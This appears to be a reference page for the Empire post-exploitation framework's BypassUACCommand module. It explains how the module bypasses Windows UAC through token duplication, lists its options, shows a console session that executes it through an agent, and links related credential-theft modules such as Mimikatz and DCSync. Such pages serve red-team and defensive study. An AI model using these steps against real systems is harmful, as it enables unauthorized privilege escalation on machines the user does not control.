BypassUACCommand - Empire Module
This page contains detailed information about how to use the csharp/Sharpsploit.Credentials/BypassUACCommand Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: BypassUACCommand
Module: csharp/Sharpsploit.Credentials/BypassUACCommand
Source code:
empire/server/modules/csharp/Sharpsploit.Credentials.Covenant.yaml#L536
Language: C#
Needs admin: No
OPSEC safe: No
Background: No
The BypassUACCommand module bypasses UAC through token duplication and executes a command with high integrity.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the BypassUACCommand module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the BypassUACCommand module:
Agent
Agent to run module on.
Command
Command to execute with high integrity.
DotNetVersion
.NET version to compile against.
Default value: Net35
.
Suggested values: Net35
, Net40
.
Additional Module Options
This is a list of additional options that are supported by the BypassUACCommand module:
Directory
Directory containing the Command executable.
Parameters
Command line parameters to pass to the Command.
ProcessID
ProcessID.
BypassUACCommand Example Usage
Here's an example of how to use the BypassUACCommand module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule csharp/Sharpsploit.Credentials/BypassUACCommand
Author cobbr_io
Background False
Description Bypasses UAC through token duplication and executes a command with
high integrity.
Language csharp
Name csharp/Sharpsploit.Credentials/BypassUACCommand
NeedsAdmin False
OpsecSafe False
,Record Options-,-------,----------,------------------------------------,
| Name | Value | Required | Description |
|---------------|-------|----------|------------------------------------|
| Agent | | True | Agent to run module on. |
|---------------|-------|----------|------------------------------------|
| Command | | True | Command to execute with high |
| | | | integrity. |
|---------------|-------|----------|------------------------------------|
| Directory | | False | Directory containing the Command |
| | | | executable. |
|---------------|-------|----------|------------------------------------|
| DotNetVersion | Net35 | True | .NET version to compile against |
|---------------|-------|----------|------------------------------------|
| Parameters | | False | Command line parameters to pass to |
| | | | the Command. |
|---------------|-------|----------|------------------------------------|
| ProcessID | 0 | False | ProcessID. |
'---------------'-------'----------'------------------------------------'
(Empire: usemodule/csharp/Sharpsploit.Credentials/BypassUACCommand) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/csharp/Sharpsploit.Credentials/BypassUACCommand) > set Command SomeCommand
[*] Set Command to SomeCommand
(Empire: usemodule/csharp/Sharpsploit.Credentials/BypassUACCommand) > set DotNetVersion Net35
[*] Set DotNetVersion to Net35
(Empire: usemodule/csharp/Sharpsploit.Credentials/BypassUACCommand) > execute
[!] Error: csharpserver plugin not running
Note: This module requires csharpserver plugin to be running on our system. If this plugin is not running, the error message "[!] Error: csharp server plugin not running
" is thrown on the console. To fix the error, start the csharpserver plugin and re-run the module:
(Empire: usemodule/csharp/Sharpsploit.Credentials/BypassUACCommand) > useplugin csharpserver
,Record Options--,----------,----------------------------------,
| Name | Value | Required | Description |
|--------|-------|----------|----------------------------------|
| status | start | True | Start/stop the Empire C# server. |
'--------'-------'----------'----------------------------------'
(Empire: useplugin/csharpserver) > execute
[*] Starting Empire C# server
(Empire: useplugin/csharpserver) > back
(Empire: usemodule/csharp/Sharpsploit.Credentials/BypassUACCommand) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
- cobbr_io
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/csharp/Sharpsploit.Credentials.Covenant.yaml#L536
- https://twitter.com/cobbr_io
See Also
Check also the following modules related to this module:
- csharp/Sharpsploit.Credentials/MakeToken
- csharp/Sharpsploit.Credentials/GetSystem
- csharp/Sharpsploit.Credentials/ImpersonateProcess
- csharp/Sharpsploit.Credentials/ImpersonateUser
- csharp/Sharpsploit.Credentials/BypassUACGrunt
- csharp/Sharpsploit.Credentials/RevertToSelf
- csharp/Sharpsploit.Credentials/LogonPasswords
- csharp/Sharpsploit.Credentials/LsaSecrets
- csharp/Sharpsploit.Credentials/LsaCache
- csharp/Sharpsploit.Credentials/SamDump
- csharp/Sharpsploit.Credentials/Wdigest
- csharp/Sharpsploit.Credentials/DCSync
- csharp/Sharpsploit.Credentials/Mimikatz
- csharp/Sharpsploit.Credentials/SafetyKatz
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.